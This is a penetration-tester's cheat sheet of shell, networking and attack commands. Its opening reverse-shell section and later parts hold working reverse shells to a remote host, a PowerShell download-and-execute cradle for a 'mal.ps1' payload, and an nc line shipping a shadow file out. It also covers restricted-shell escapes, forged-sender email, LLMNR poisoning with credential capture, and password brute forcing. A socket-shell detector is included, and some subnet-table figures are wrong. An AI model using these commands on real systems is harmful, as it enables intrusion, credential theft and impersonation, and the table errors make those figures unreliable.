Field Manual

Table of Contents

- 0x00 — Quick Reference 🚀
- 0x01 — Reverse Shells 🐚: Linux 🐧, Python 🐍
- 0x16 - Quality of Life 🤕: Bash-ish, I/O 💻, Change iface names 🥅, Realtek Driver Install 🔨, WiFi Monitor Mode 🔎, Kismet Setup 💋, Kali Pinned on Ubuntu 🐲, Kali Missing Key Fix 🐲, Netfig 🥅, Link Files to null ⚡️, pv utility 🔨, Password Dump Search 🔍, Nix Fix ⛑, .bash_aliases 👻, log terminal sessions, Shortcut directories, Firefox Profiles
- 0x10 - Linux 🐧
- 0x11 — BinaryID 📇: objdump 🚚
- 0x12 — Everythin netcat 🐱
- 0x13 — D/encoding Data 🔑: CyberChef 🕵, Base64 🤙
- 0x14 - RECON 👀: DNS Enumeration 📛, Mirror sites 🔀
- 0x15 — CTF 👮: Executions 🔫, File Downloads ⏬, Secure Deletion 🔐
- 0x20 — Windows 🤖
- 0x21 — CMD 👴
- 0x22 — Powershell 💪
- 0x30 - Placeholder
- 0x31 TBD
- 0x40 — Alternatives ♻️
- 0x41 — XMLHttpRequest.js 🕸
- 0x50 - Networking 🤓
- 0x51 - Reference Tables: TTL Fingerprints 🤞, Classful IPv4 Ranges 🔩, Private IPv4 Ranges 🔩, IPv4 Subnets 🔩
- 0x52 - DIY Servers 🖥
- 0x56 - Mounting Shares 🐧
- 0x57 - SMB Enum 🐧
- 0x58 - NetBIOS/LLMNR 🛂
- 0x59 - Port Forwarding 🚡: Windows 👴, Linux 🐧
- 0xFF - Appendix 💦: Links 🔗, Alt. References 🔗, Hash Reference 🥔, John the Ripper 🔪, Hydra 🐉, Cheat Sheets 👀
Tips & tricks of the more ultra rare, spicy, variety.
On opposite day are reverse shells, bind shells? 💙
```bash
# Only works with the bash shell
rhost="10.0.0.1"; rport="8080"; /bin/bash -i &> /dev/tcp/${rhost}/${rport} 0>&1
# bash -s | option enables bash to read from 'stdin'
```

```bash
# Requires the nc binary
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.1 8080 >/tmp/f
```

```bash
# Python2.7 command (-c) to connect to 10.0.0.1:8080 using the socket library
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
```

```bash
# Declare an indexed array
declare -a my_array
my_array[0]='zero'
my_array[1]='one'
# OR
my_array=(zero one)
# Print each element in my_array
for i in "${my_array[@]}"; do echo "$i"; done

# Declare an associative array (dictionary)
# (unset my_array first if it already exists as an indexed array)
declare -A my_array
my_array=([z]=zero [o]=one)
# Print each key in my_array
for key in "${!my_array[@]}"; do echo "$key"; done

# Returns the size of the array
echo "${#my_array[@]}"

# Append to the array (the parentheses add a new element instead of
# appending text to element 0)
my_array+=(three)

# Remove an index from the array (quoted so the shell does not glob it)
unset 'my_array[2]'

# Remove key/pair from assoc. array
unset 'my_array[o]'
```
| I/O OP | USAGE |
|---|---|
| `1> results.txt` | stdout writes to the file |
| `2> stderr.txt` | stderr writes to the file |
| `&> out.txt` | stdout & stderr write to the file |
| `nc 10.0.0.1 1337 < shadow.txt` | Send file input to 10.0.0.1:1337 |

| COMMAND | EXAMPLE | INFO |
|---|---|---|
| `fmt` | `cat words.txt \| fmt` | Formats stdin into paragraphs. |
| `pr` | `cat words.txt \| fmt \| pr` | Formats stdin into pages. |
| `lpr` | `cat words.txt \| fmt \| pr \| lpr` | Sends stdin to a printer. |
| `tr` | `cat /dev/urandom \| tr -dc '[:alnum:]'` | Output random password from /dev/urandom |
```bash
# Change Ubuntu 18.04 Network interfaces back to wlan/eth
sudo vim /etc/default/grub
# Edit the variable 'GRUB_CMDLINE_LINUX' to the following:
GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
# Write / Quit then run the following
sudo update-grub && sudo reboot
# Check
sudo ip a
```

```bash
# Download aircrack-ng linux driver
git clone -b v5.3.4 https://github.com/aircrack-ng/rtl8812au.git
cd rtl*
sudo make -j4
sudo make install
# 'make' installs the '88XXau.ko' driver to '/lib/modules/5.0.0-25-generic/kernel/drivers/net/wireless/' on Ubuntu 18.04

# Now edit /etc/NetworkManager/NetworkManager.conf and add the following. Replace the mac with the mac of the card
[keyfile]
unmanaged-devices=mac:00:c0:ca:95:b8:58
# Write / Quit
sudo service NetworkManager restart
```

```bash
# Set interface down
sudo ip link set wlan1 down
# Set monitor mode
sudo iw dev wlan1 set type monitor
# Set interface up
sudo ip link set wlan1 up

# airodump-ng
sudo airodump-ng -w testdump --wps --beacon --band ag -M -U wlan1
```

```bash
# Install for Ubuntu 18.04
wget -O - https://www.kismetwireless.net/repos/kismet-release.gpg.key | sudo apt-key add -
echo 'deb https://www.kismetwireless.net/repos/apt/release/bionic bionic main' | sudo tee /etc/apt/sources.list.d/kismet.list
sudo apt update
sudo apt install -y kismet

kismet wlan1
# Then go to the web interface http://localhost:2501
```

```bash
# Add the following to /etc/apt/preferences.d/preferences
Package: *
Pin: release o=Ubuntu
Pin-Priority: 1000

Package: *
Pin: release a=kali-rolling
Pin-Priority: 100
# Write / Quit

echo -n 'deb http://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list

sudo apt update
```

```bash
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add -
```

```bash
# Spoof MAC Address
ifconfig eth0 hw ether 00:1c:bf:87:25:d5

# Change Default Gateway
route add default gw $IP_ADDRESS $INTERFACE_NAME
```

```bash
# Symbolic link of /dev/null to new file of ${HOME}/nohup.out
ln -s /dev/null ${HOME}/nohup.out
```

pv utility 🔨

```bash
# Display progress of file being read
pv -p -e '/usr/share/wordlists/WORDLISTS.tar.gz' | zgrep -ia 'myemail@gmail.com' | tee /tmp/results.lst
```

```bash
gzip -cd *.tar.gz | grep -aniTEf ~/data/emails.egrep > matches.txt
# gzip --stdout --decompress
```

```bash
# EXPIRED KEY - APT UPDATE
wget -O - http://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add -
```

| ALIASES | INFO |
|---|---|
| alias ..='cd ..' | cd command shortcut |
| alias ...='cd ../../../' | cd command shortcut |
| alias ....='cd ../../../../' | cd command shortcut |
| alias .2='cd ../../' | cd command shortcut |
| alias .3='cd ../../../' | cd command shortcut |
| alias .4='cd ../../../../' | cd command shortcut |
| alias .5='cd ../../../../../' | cd command shortcut |
| alias _='sudo' | sudo command shortcut |
| alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal | alert a notification popup |
| alias bc='bc -l' | bc command fix |
| alias c='clear' | clear command shortcut |
| alias chgrp='sudo chgrp --preserve-root' | sudo command shortcut |
| alias chmod='sudo chmod --preserve-root' | sudo command shortcut |
| alias chown='sudo chown --preserve-root' | sudo command shortcut |
| alias chownd='sudo chown -R --preserve-root $USER:$USER' | sudo command shortcut |
| alias dd='dd status=progress' | Status is always progress |
| alias dr='docker run -it' | Run container interactively |
| alias drm='docker run -it --rm' | Run container then remove |
| alias drme='docker run -it --rm -e HOME=$HOME -v $HOME:$HOME -w $PWD -u $(id -u):$(id -g)' | Run container with env variables |
| alias egrep='egrep --color=auto' | *grep command shortcut |
| alias exot='exit' | exit typo fix |
| alias ff='sudo find . -type f -iname $1 2>/dev/null' | find a file from the current dir |
| alias fgrep='fgrep --color=auto' | *grep command shortcut |
| alias grep='grep --color=auto' | *grep command shortcut |
| alias halt='sudo /sbin/halt' | sudo command shortcut |
| alias ipt='sudo iptables' | iptables command shortcut |
| alias iptlist='sudo /sbin/iptables -L -n -v --line-numbers' | iptables command shortcut |
| alias iptlistfw='sudo /sbin/iptables -L FORWARD -n -v --line-numbers' | iptables command shortcut |
| alias iptlistin='sudo /sbin/iptables -L INPUT -n -v --line-numbers' | iptables command shortcut |
| alias iptlistout='sudo /sbin/iptables -L OUTPUT -n -v --line-numbers' | iptables command shortcut |
| alias l='ls -CF' | ls command shortcut |
| alias la='ls -AF --color=auto' | ls command shortcut |
| alias lc='cat -n' | cat with line numbers |
| alias less='less -S' | Do NOT wrap lines in less |
| alias lh='ls --color=auto -lisAdhF .[^.]*' | ls command shortcut |
| alias ll='ls -lhF --color=auto' | ls command shortcut |
| alias lla='ls -lAhF --color=auto' | ls command shortcut |
| alias ls='ls --color=auto' | ls command shortcut |
| alias mkdir='mkdir -pv' | mkdir folders verbosely |
| alias netstat='sudo netstat -plan' | netstat all listening ports |
| alias path='echo -e ${PATH//:/\\n}' | echo current $PATH variable |
| alias ping='ping -c 3' | Do NOT ping continuously |
| alias poweroff='sudo /sbin/poweroff' | sudo command shortcut |
| alias reboot='sudo /sbin/reboot' | sudo command shortcut |
| alias reload='reset; . ~/.bashrc; . ~/.bash_aliases' | Reload bash with proper env |
| alias rm='rm -I --preserve-root' | rm interactively |
| alias rms='shred -uz' | rm securely |
| alias shutdown='sudo /sbin/shutdown' | sudo command shortcut |
| alias txz='tar --xz -xf' | Un-tar xz files |
| alias tzx='tar -zxf' | Un-tar gzip files |
| alias wget='wget -c' | Continue wget downloads |
```bash
script -t 2> timing.log -a output.session
scriptreplay timing.log output.session
```

```bash
# Bookmark directories using 'pushd'
pushd /var/www/html/
pushd /etc/apt/
pushd ~/Projects/airodump/aug/

# Then use 'popd' to pull from the stack!
popd
```

```bash
firefox --noremote --ProfileManager
```
General Debian/Ubuntu based distro copy-&-paste-able commands
```bash
objdump -f "$file" | grep '^architecture' | cut -d, -f1 | sed 's/architecture: //'

file mysterio.bin
```

```bash
# Target 1
/bin/bash -i &> /dev/tcp/${rhost}/${rport} 0>&1

# Reverse Shell
mknod backpipe p; nc ${rhost} ${rport} 0<backpipe | /bin/bash 1>backpipe
```
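The `/dev/tcp` form above and the Python `dup2` one-liner in the Reverse Shells section both leave an interactive shell whose stdin, stdout and stderr are the same TCP socket. The block below is an added example, not part of the original page, that checks a /proc tree for that state; the function names, the proc-root parameter and the sample tree are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original page). Lists shell processes whose
# stdin, stdout and stderr are all sockets. The proc root is a parameter
# (an assumption of this sketch) so it runs on /proc or on a constructed tree.

# Print "PID COMM FD2-TARGET" for each match under $1 (default: /proc).
find_socket_shells() {
    local proc_root="${1:-/proc}" dir comm fd target hit
    for dir in "$proc_root"/[0-9]*; do
        [ -r "$dir/comm" ] || continue
        comm="$(cat "$dir/comm" 2>/dev/null)" || continue
        case "$comm" in
            sh|bash|dash|zsh|ksh) ;;   # only shells are of interest
            *) continue ;;
        esac
        hit=1
        for fd in 0 1 2; do
            # readlink fails if the process exited or we lack permission
            target="$(readlink "$dir/fd/$fd" 2>/dev/null)" || target=""
            case "$target" in
                socket:*) ;;
                *) hit=0; break ;;
            esac
        done
        if [ "$hit" -eq 1 ]; then
            printf '%s %s %s\n' "${dir##*/}" "$comm" "$target"
        fi
    done
    return 0
}

# Constructed /proc-like tree for the demo; PIDs and inode numbers are made up.
add_proc() {  # usage: add_proc ROOT PID COMM FD0 FD1 FD2
    mkdir -p "$1/$2/fd"
    printf '%s\n' "$3" > "$1/$2/comm"
    ln -s "$4" "$1/$2/fd/0"
    ln -s "$5" "$1/$2/fd/1"
    ln -s "$6" "$1/$2/fd/2"
}
make_sample_proc() {
    add_proc "$1" 101 bash /dev/pts/0 /dev/pts/0 /dev/pts/0                   # terminal session
    add_proc "$1" 202 bash 'socket:[48213]' 'socket:[48213]' 'socket:[48213]' # /dev/tcp or dup2 form
    add_proc "$1" 303 bash 'pipe:[5150]' 'pipe:[5151]' 'pipe:[5151]'          # named-pipe + nc form
    add_proc "$1" 404 nc 'pipe:[5151]' /tmp/f /dev/pts/1                      # nc side of that form
}

demo_root="$(mktemp -d)"
make_sample_proc "$demo_root"
find_socket_shells "$demo_root"   # prints: 202 bash socket:[48213]
rm -rf "$demo_root"
```

The named-pipe variants are not matched, because there the shell sits on pipes and `nc` holds the socket. On a live host, run `find_socket_shells /proc` as root so the fd links of other users' processes are readable.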
```bash
# One-shot Web Server
{ printf 'HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n' "$(wc -c < some.file)"; cat some.file; } | nc -l ${lport}

# UDP Port scan
nc -vzu ${rhost} ${rports}

# Port scanning
nc -v -n -z -w 1 ${rhost} ${rports}

# NCat
# HTTPS GET Request
printf 'GET /rootme HTTP/1.1\r\nHost: rootme.com\r\n\r\n' | ncat --ssl rootme.com 443

# NCat SMTP Client
ncat -C mail.rootme.com 25
# HELO client.rootme.com
# MAIL FROM:attacker@rootme.com
# RCPT TO:victim@rootme.com
# DATA
# From: ceo@rootme.com
# To: victim@rootme.com
# Subject: You're fired.
#
# Sorry not sorry.
# .
# QUIT

# Netcat HTTP Request
nc 10.0.0.1 80
GET / HTTP/1.1
Host: 10.0.0.1
User-Agent: Mozilla/5.0
Referer: google.com
# <hit enter>

# Simple Web Server
# Linux
ncat -lk -p 8080 --sh-exec "echo -e 'HTTP/1.1 200 OK\r\n'; cat index.html"
# or
ncat --lua-exec httpd.lua --listen 8080 --keep-open
# Windows
ncat -lk -p 8080 --sh-exec "echo HTTP/1.1 200 OK& echo(&type index.html"

# Port forward
ncat -l localhost 8080 --sh-exec "ncat example.org 80"

# SSH Tunnel NCat
ssh -o ProxyCommand="ssh -q ${gateway} ncat %h %p" ${rhost}

# Dynamic SSH Tunnel
ssh ${gateway} -D 8080
ncat --proxy localhost:8080 --proxy-type socks5 ${rhost}

# SSH Tunneled NCat file transfer
ssh -NfL 1337:localhost:7331
ncat -v -w 2 localhost 1337 < sent
ncat -lvnp 7331 localhost > received

# NCat honeyport
ncat -l --keep-open 1337 --hex-dump gotscanned.log > /dev/null

# NCat SSL Tunnel
openssl req -new -x509 -keyout test-key.pem -out test-cert.pem
ncat --listen --ssl --ssl-cert test-cert.pem --ssl-key test-key.pem
ncat --ssl-verify --ssl-trustfile test-cert.pem
```

```bash
# Write base64 data without newlines
base64 -w 0 foo.zip | base64 -d > foo2.zip

# base64: Removes any invalid input
cat file.b64 | base64 -di > binary
```

```bash
# NameServers Query for target.org
dig +short ns target.org

# A RECORD DNS Query
# Goal: Get the IP's associated to the toplevel domain.
dig a target.org @nameserver

# MX RECORD DNS Query
# Goal: Find mail servers to enumerate
dig mx target.org @nameserver

# DNS Zone Transfer Query
# Goal: Acquire all DNS entries for hosts within the 'target.org' zone
dig axfr target.org @nameserver

# Bruteforce Subdomains
dnsrecon -d zonetransfer.me -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
```

```bash
wget --mirror -k ${depth} ${url}
# -OR- httrack
```

Workarounds for restricted shells.
```bash
# ez pz
cd "$(dirname ${path_to_bin}/rootme)"

# TTY Spawn
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

# Vi
vi
:!bash

# gcc compile
echo 'int main() { return chmod("/bin/chmod", 0755); }' | gcc -x c - && ./a.out

# x86 load file
/lib/i386-linux-gnu/ld-linux.so.2 ${path_to_bin}/rootme

# x64 load file
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ${path_to_bin}/rootme

install -m a+x /bin/chmod /tmp/chmod2
```

```bash
curl -s https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat -o /tmp/socat/socat

# browser => developer tools => network => copy & paste response to file
cat file.b64 | base64 -di > binary
```

```bash
_DEVICE="/dev/sdc"
_PASS=$(tr -cd '[:alnum:]' < /dev/urandom | head -c 128)
openssl enc -aes-256-ctr -pass pass:"${_PASS}" -nosalt </dev/zero | dd bs=64K ibs=64K of=$_DEVICE status=progress conv=notrunc
```

```bat
type C:\Users\Administrator\Desktop\flag.txt

REM Mount SMB Share
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
```

```powershell
iex ((New-Object Net.WebClient).DownloadString("https://abc.ru/mal.ps1"))

&"{Get-Content .\mal.ps1 | iex}"

Get-FileHash -Algorithm SHA512 .\test.txt

gci | foreach-object { write-output "Object: $_" }
gci | % { write-output "Object: $_" }

get-process | where-object { $_.name -eq "notepad" }
get-process | ? { $_.name -eq "notepad"}

1..254 | % { test-connection 192.168.0.$_ }
```

```javascript
// WUTitDO: Download a binary from Github

var github_user = "andrew-d";
var git_branch = "master";

// Raw base64 encoded byte stream
var b64raw = "https://raw.githubusercontent.com/"+ github_user +"/static-binaries/"+ git_branch +"/binaries/linux/x86_64/socat";

var xreq = new XMLHttpRequest();
xreq.open('GET', b64raw, true);
// The request is asynchronous, so write the response only once it has loaded
xreq.onload = function () { document.write(this.responseText); };
xreq.send();
// Your webpage should now be base64 text to save

// If method 1 doesn't work try this!
var apijson = "https://api.github.com/repos/"+ github_user +"/static-binaries/contents/binaries/linux/x86_64/socat?ref=master";

var xreq = new XMLHttpRequest();
xreq.open('GET', apijson, true);
// Parse the JSON body after it has loaded; 'content' holds the base64 text
xreq.onload = function () { document.write(JSON.parse(this.responseText).content); };
xreq.send();
// Your webpage should now be base64 text to save
```

| OPERATING SYSTEM | TTL SIZE |
|---|---|
| Windows | 128 |
| Linux | 64 |
| Solaris | 255 |
| Cisco / Network | 255 |
| CLASS | IP ADDRESS RANGE |
|---|---|
| A | 0.0.0.0 - 127.255.255.255 |
| B | 128.0.0.0 - 191.255.255.255 |
| C | 192.0.0.0 - 223.255.255.255 |
| D | 224.0.0.0 - 239.255.255.255 |
| E | 240.0.0.0 - 255.255.255.255 |
| CLASS | RANGE |
|---|---|
| A | 10.0.0.0 - 10.255.255.255 |
| B | 172.16.0.0 - 172.31.255.255 |
| C | 192.168.0.0 - 192.168.255.255 |
| D | 127.0.0.0 - 127.255.255.255 |
| CIDR | DECIMAL MASK | NUMBER OF HOSTS |
|---|---|---|
| /31 | 255.255.255.254 | 1 Host |
| /30 | 255.255.255.252 | 2 Hosts |
| /29 | 255.255.255.248 | 6 Hosts |
| /28 | 255.255.255.240 | 14 Hosts |
| /27 | 255.255.255.224 | 30 Hosts |
| /26 | 255.255.255.192 | 62 Hosts |
| /25 | 255.255.255.128 | 126 Hosts |
| /24 | 255.255.255.0 | 254 Hosts |
| /23 | 255.255.254.0 | 512 Host |
| /22 | 255.255.252.0 | 1022 Hosts |
| /21 | 255.255.248.0 | 2046 Hosts |
| /20 | 255.255.240.0 | 4094 Hosts |
| /19 | 255.255.224.0 | 8190 Hosts |
| /18 | 255.255.192.0 | 16382 Hosts |
| /17 | 255.255.128.0 | 32766 Hosts |
| /16 | 255.255.0.0 | 65534 Hosts |
| /15 | 255.254.0.0 | 131070 Hosts |
| /14 | 255.252.0.0 | 262142 Hosts |
| /13 | 255.248.0.0 | 524286 Hosts |
| /12 | 255.240.0.0 | 1048674 Hosts |
| /11 | 255.224.0.0 | 2097150 Hosts |
| /10 | 255.192.0.0 | 4194302 Hosts |
| /9 | 255.128.0.0 | 8388606 Hosts |
| /8 | 255.0.0.0 | 16777214 Hosts |
```bash
python -m SimpleHTTPServer 8080
python3 -m http.server 8080
php -S 0.0.0.0:8080
```

```bash
# NFS Shares are linux predominant
mount 10.0.0.1:/vol/share /mnt/nfs
# CIFS is a dialect of SMB and are windows predominant
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
```

```bash
# Enumerate users
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 10.0.0.1
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 10.0.0.0/24

# Default linux utilities
nmblookup -A 10.0.0.1
smbclient //MOUNT/share -I 10.0.0.1 -N
rpcclient -U "" 10.0.0.1

# SMB Version
smbclient -L //10.0.0.1

# Open SMB Shares on a subnet
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=${username},smbpass=${password} -p445 10.0.0.0/24

# See links for download
enum4linux 10.0.0.1
```

```bash
msfconsole

# Spoof/Poison
use auxiliary/spoof/llmnr/llmnr_response
use auxiliary/spoof/nbns/nbns_response

# Capture Credentials
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm

# -OR- See links to download
python Responder.py -i ${localhost-ip} -I eth0

# Produces NTLMv2 Hash to crack
```

```bat
REM See appendix for plink download link
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
```

- `-A` Allows Agent Forwarding
- `-N` Do NOT execute a command
- `-f` Background the process

```bash
# Local Port Forward
ssh -NAfL ${lport}:${final-host}:${rport} ${user}@${gateway-host}
# Example
ssh -NAfL 8080:192.168.0.3:80 root@192.168.0.2
```

```bash
# Remote Port Forward
ssh -NAfR ${rport}:localhost:${port-to-publicize} user@${proxy-host}
ssh -NAfR 2222:localhost:22 user@192.168.0.2
```

```bash
# Dynamic SOCKS Proxy
ssh -NAfD ${remote-proxy-port} ${remote-proxy-host}
# Example
ssh -NAfD 8080 root@10.0.0.80
```
| Link | Usage |
|---|---|
| SimplyEmail | Email enumeration tool hosted on Github. |
| udp-proto-scanner | UDP protocols scanner hosted on Github. |
| Responder.py | NetBIOS/LLMNR Poisoning and Spoofing tool to capture NTLMv2 Hashes, hosted on Github. |
| plink.exe | Link to download the x64 plink binary from the PuTTY project, for Remote Port Forwarding. |
| HASH | SIZE |
|---|---|
| MD5 Hash Length | 16 Bytes |
| SHA-1 | 20 Bytes |
| SHA-256 | 32 Bytes |
| SHA-512 | 64 Bytes |
| HASH | EXAMPLE |
|---|---|
| MD5 Hash | 8743b52063cd84097a65d1633f5c74f5 |
| MD5 $PASS:$SALT | 01dfae6e5d4d90d9892622325959afbe:7050461 |
| MD5 $SALT:$PASS | f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 |
| SHA1 Hash | b89eaac7e61417341b710b727768294d0e6a277b |
| SHA1 $PASS:$SALT | 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 |
| SHA1 $SALT:$PASS | cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 |
| SHA-256 | 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 |
| SHA-256 $PASS:$SALT | c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 |
| SHA-256 $SALT:$PASS | eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 |
| SHA-512 | 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f |
| SHA-512 $PASS:$SALT | e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd |
| SHA-512 $SALT:$PASS | 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a |
| NTLM Hash | b4b9b02e6f09a9bd760f388b67351e2b |
```bash
# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
# Formatted Hash with Wordlist Attack
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
# Formatted Hash with Bruteforce Attack
john --format=descrypt hash --show
```

```bash
# FTP
hydra -l ${USERNAME} -P /usr/share/wordlists/nmap.lst -f 10.0.0.1 ftp -V
# POP3
hydra -l ${USERNAME} -P /usr/share/wordlists/nmap.lst -f 10.0.0.1 pop3 -V
# SMTP
hydra -P /usr/share/wordlists/nmap.lst -f 10.0.0.1 smtp -V

# Use (-t) to limit concurrent connections - ex: hydra -t 15
```